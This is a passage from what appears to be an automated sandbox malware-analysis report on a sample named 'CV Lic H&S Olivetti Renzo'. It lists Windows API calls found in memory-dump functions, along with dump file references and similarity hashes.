                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                        • String ID: cdecl
                                                                                        • API String ID: 4031866154-3896280584
                                                                                        • Opcode ID: e92de89fe55839cbb86fd940a83e2033163b95ef2288510dd4e324dbac455820
                                                                                        • Instruction ID: c9bbe978300eab4a7532172704b4b4823494e80cc29ac0ef486fa4090ac2a1e2
                                                                                        • Opcode Fuzzy Hash: e92de89fe55839cbb86fd940a83e2033163b95ef2288510dd4e324dbac455820
                                                                                        • Instruction Fuzzy Hash: 4E11BE36200345EFDB2AAF74DC05E7A77A8FF49314B81412AE806CB290EB71DC50D7A0
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 003B2FB5
                                                                                          • Part of subcall function 003A395C: __FF_MSGBANNER.LIBCMT ref: 003A3973
                                                                                          • Part of subcall function 003A395C: __NMSG_WRITE.LIBCMT ref: 003A397A
                                                                                          • Part of subcall function 003A395C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,0039F507,?,0000000E), ref: 003A399F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: 85a0dd8b1567e8af739f17675f894a8498cc707a429f521f91f3e308d56298d6
                                                                                        • Instruction ID: e99bdba01535fc5672df11955e1f3bdeca13114741f1427b3e9141d1275f38a8
                                                                                        • Opcode Fuzzy Hash: 85a0dd8b1567e8af739f17675f894a8498cc707a429f521f91f3e308d56298d6
                                                                                        • Instruction Fuzzy Hash: 48112C31409225ABCB333FB4AC446EA3BA8EF05374F214525FA0ADE561DF30CD408690
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003C05AC
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003C05C7
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003C05DD
                                                                                        • FreeLibrary.KERNEL32(?), ref: 003C0632
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                        • String ID:
                                                                                        • API String ID: 3137044355-0
                                                                                        • Opcode ID: 4db281e899b7abb24479c5f9895f60427b89891e78c5dd597e9f43bea82c35e4
                                                                                        • Instruction ID: bfbb7556fe26607638f04ed7f078edc4c48d8dec70290407b5a7e0570b1b0aaa
                                                                                        • Opcode Fuzzy Hash: 4db281e899b7abb24479c5f9895f60427b89891e78c5dd597e9f43bea82c35e4
                                                                                        • Instruction Fuzzy Hash: 02215971900289EBDB26CF91DD88FDABBB8EB40700F00846DA916E6050DB74EE699B50
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003C6733
                                                                                        • _memset.LIBCMT ref: 003C6754
                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003C67A6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003C67AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1157408455-0
                                                                                        • Opcode ID: 4d13d0d1ad8404d08b16c526caf3ea5a9318a2aabdfda96e7b03ef996e2048b4
                                                                                        • Instruction ID: fabd052b2f87818fe0a013512c6b2a3db6a1fa4aed6d2aa13f91efcc398482d8
                                                                                        • Opcode Fuzzy Hash: 4d13d0d1ad8404d08b16c526caf3ea5a9318a2aabdfda96e7b03ef996e2048b4
                                                                                        • Instruction Fuzzy Hash: F4110A72D012287AE72057A5AC4DFABBBBCEF44724F1045AAF504E71C0D2744E848B68
                                                                                        APIs
                                                                                          • Part of subcall function 003BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003BAA79
                                                                                          • Part of subcall function 003BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003BAA83
                                                                                          • Part of subcall function 003BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003BAA92
                                                                                          • Part of subcall function 003BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003BAA99
                                                                                          • Part of subcall function 003BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003BAAAF
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,003BADE4,?,?), ref: 003BB21B
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003BB227
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 003BB22E
                                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 003BB247
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 4217664535-0
                                                                                        • Opcode ID: f49f36369c479f46a64f9f4bb377f8d1878b303ec4a56e8da07b3e6739459643
                                                                                        • Instruction ID: dc3cb2a04e677ac0c133459cae4aa69d17497fdeff8847c9036602603b956e17
                                                                                        • Opcode Fuzzy Hash: f49f36369c479f46a64f9f4bb377f8d1878b303ec4a56e8da07b3e6739459643
                                                                                        • Instruction Fuzzy Hash: 7C119171A00205EFDB059F98DD85AEEB7A9EF85308F15842DEA42AB610DB71AE44CB10
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003BB498
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003BB4AA
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003BB4C0
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003BB4DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 3d90c72899f466fa5e9624fb31e5c5fb284c4b6cca11ffbfcb6c586cfc8a78a6
                                                                                        • Instruction ID: 26006cf90cfed6b744b6c372a6a46b1493e0efb347de1c21a942525a77f6bb95
                                                                                        • Opcode Fuzzy Hash: 3d90c72899f466fa5e9624fb31e5c5fb284c4b6cca11ffbfcb6c586cfc8a78a6
                                                                                        • Instruction Fuzzy Hash: 6511187A900218FFDB11DFA9C985EDDBBB8FB08714F204091E604B7295DB71AE11DB94
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0039B5A5
                                                                                        • GetClientRect.USER32(?,?), ref: 003FE69A
                                                                                        • GetCursorPos.USER32(?), ref: 003FE6A4
                                                                                        • ScreenToClient.USER32(?,?), ref: 003FE6AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: 7f6883261c3a5ca4dc3fa81e51c87c380f699e4c3af766e8936dc8cd0ce2daf9
                                                                                        • Instruction ID: 4a450eef278574a949a3be1edc65f3afe1e3fc0e027ca5a78ddc1b22ab59b469
                                                                                        • Opcode Fuzzy Hash: 7f6883261c3a5ca4dc3fa81e51c87c380f699e4c3af766e8936dc8cd0ce2daf9
                                                                                        • Instruction Fuzzy Hash: E9113635900029BBDF11EF98DE859AEB7B9EF09304F420461E901E7150D734AA85CBA5
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003C7352
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 003C7385
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003C739B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003C73A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2880819207-0
                                                                                        • Opcode ID: afe15a5027e973ebf8057320a59db7f9ccbff77f5be01bed0741dfb3ee9e4dea
                                                                                        • Instruction ID: caadac11534c18fa580f84fc9ad44a6795fbcbda93ffd71d7ebaaca7622e03db
                                                                                        • Opcode Fuzzy Hash: afe15a5027e973ebf8057320a59db7f9ccbff77f5be01bed0741dfb3ee9e4dea
                                                                                        • Instruction Fuzzy Hash: D7110876A04254BFC7029FACDC09FDE7BADAB45321F044369FC21E3251D6B08D049BA4
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0039D1BA
                                                                                        • GetStockObject.GDI32(00000011), ref: 0039D1CE
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0039D1D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3970641297-0
                                                                                        • Opcode ID: 3f10a554855db268ea8aa2dda817defb9ca96419cf096b53390528a68f7f39fe
                                                                                        • Instruction ID: 150dd48dc400b4a2afb919b756f21babc17f911cc82f8a286893bc6ceeab5f84
                                                                                        • Opcode Fuzzy Hash: 3f10a554855db268ea8aa2dda817defb9ca96419cf096b53390528a68f7f39fe
                                                                                        • Instruction Fuzzy Hash: 5211A973501509BFEF024FA0DC52EEABB6DFF09364F050122FA1666060C732DC60ABA0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction ID: 950ecb939c48f08628ef334fbbe285e5c4ed4f9a1e5c646f2f6a253f214938dd
                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                        • Instruction Fuzzy Hash: 3F01493600014EBBCF135E84DC018EE3F67BB18358B598455FF2859932D336DAB2AB89
                                                                                        APIs
                                                                                          • Part of subcall function 003A7A0D: __getptd_noexit.LIBCMT ref: 003A7A0E
                                                                                        • __lock.LIBCMT ref: 003A748F
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 003A74AC
                                                                                        • _free.LIBCMT ref: 003A74BF
                                                                                        • InterlockedIncrement.KERNEL32(01855248), ref: 003A74D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                        • String ID:
                                                                                        • API String ID: 2704283638-0
                                                                                        • Opcode ID: f23fc067e2d17dcbccc888213e615b9a865d70f060ef2621fc1ae83d75559d05
                                                                                        • Instruction ID: 976afb5a07bb40bbfb7ed8886ffde59fef9cb49264dc82d9d63f6815722695a1
                                                                                        • Opcode Fuzzy Hash: f23fc067e2d17dcbccc888213e615b9a865d70f060ef2621fc1ae83d75559d05
                                                                                        • Instruction Fuzzy Hash: 4001D631949A11ABC713AF669D8A75DBB60FF0A721F164029F854AB680C7345901CFD6
                                                                                        APIs
                                                                                          • Part of subcall function 0039AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0039AFE3
                                                                                          • Part of subcall function 0039AF83: SelectObject.GDI32(?,00000000), ref: 0039AFF2
                                                                                          • Part of subcall function 0039AF83: BeginPath.GDI32(?), ref: 0039B009
                                                                                          • Part of subcall function 0039AF83: SelectObject.GDI32(?,00000000), ref: 0039B033
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003EEA8E
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 003EEA9B
                                                                                        • EndPath.GDI32(00000000), ref: 003EEAAB
                                                                                        • StrokePath.GDI32(00000000), ref: 003EEAB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • String ID:
                                                                                        • API String ID: 1539411459-0
                                                                                        • Opcode ID: 305f947be6efedb0b7bec2db54ce524d486e7cbb3fe2488e5111aef06b55b418
                                                                                        • Instruction ID: 40e4b9b35b5c65611eef44c90805c1fe9cca8b21b2766b2df5a9e402e488a6d8
                                                                                        • Opcode Fuzzy Hash: 305f947be6efedb0b7bec2db54ce524d486e7cbb3fe2488e5111aef06b55b418
                                                                                        • Instruction Fuzzy Hash: BDF0BE31401268BBEB139F94AD09FCE3F19AF06310F044211FE02640E187749565CBD9
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003BC84A
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 003BC85D
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003BC864
                                                                                        • AttachThreadInput.USER32(00000000), ref: 003BC86B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2710830443-0
                                                                                        • Opcode ID: 6ac2649ac463ff1b20cce3f7d41793caa3ffb70f714af6c6b8462c5dfe9c8342
                                                                                        • Instruction ID: bdd215af841be757371926c7a975e313fb7ce9efd47526833a0d628b6d798bd9
                                                                                        • Opcode Fuzzy Hash: 6ac2649ac463ff1b20cce3f7d41793caa3ffb70f714af6c6b8462c5dfe9c8342
                                                                                        • Instruction Fuzzy Hash: F3E06D71942228BADB211FA2DD0DEDB7F1CEF167A1F008421B60DE5861C6B2C584CBE0
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 003BB0D6
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,003BAC9D), ref: 003BB0DD
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003BAC9D), ref: 003BB0EA
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,003BAC9D), ref: 003BB0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: d7902a6f50bc720a7c53845c9593b6afda91525f2fc3efeca4a4f33636941b7a
                                                                                        • Instruction ID: 5ea07c8f24d03c52ddfbffed310f8d22ecd95cdfb8e418fe36981161110078e6
                                                                                        • Opcode Fuzzy Hash: d7902a6f50bc720a7c53845c9593b6afda91525f2fc3efeca4a4f33636941b7a
                                                                                        • Instruction Fuzzy Hash: 53E04F72A012119BD7202FF15E0CB977BA8AF55799F028828A745EA040DB7484058764
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 0039B496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0039B4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0039B4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 0039B4BD
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 003FDE2B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 003FDE38
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 003FDE51
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 003FDE6A
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 003FDE8A
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 003FDE95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 1a4a26415ec6b225214e05ac3fe58c41a1131146b623202c3a81d4a5dd8beb65
                                                                                        • Instruction ID: b6ea9cfb6274ad76b7fba3b9db683fb22388ceea1e85ea57b4b6c6fe96e564db
                                                                                        • Opcode Fuzzy Hash: 1a4a26415ec6b225214e05ac3fe58c41a1131146b623202c3a81d4a5dd8beb65
                                                                                        • Instruction Fuzzy Hash: FCE06D31500244AADF221FA4AD0DBE83F11AB55339F00C226FB696C0E2C7714584DB11
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 2ab95a868bf964a40117ff45cbf52f7aedb39bef3fc29957b92ad122bce3f160
                                                                                        • Instruction ID: 3af33ece3c13b68723aa37cd3996492cb0a585b73acd2c17ed3af5ce6ba61dee
                                                                                        • Opcode Fuzzy Hash: 2ab95a868bf964a40117ff45cbf52f7aedb39bef3fc29957b92ad122bce3f160
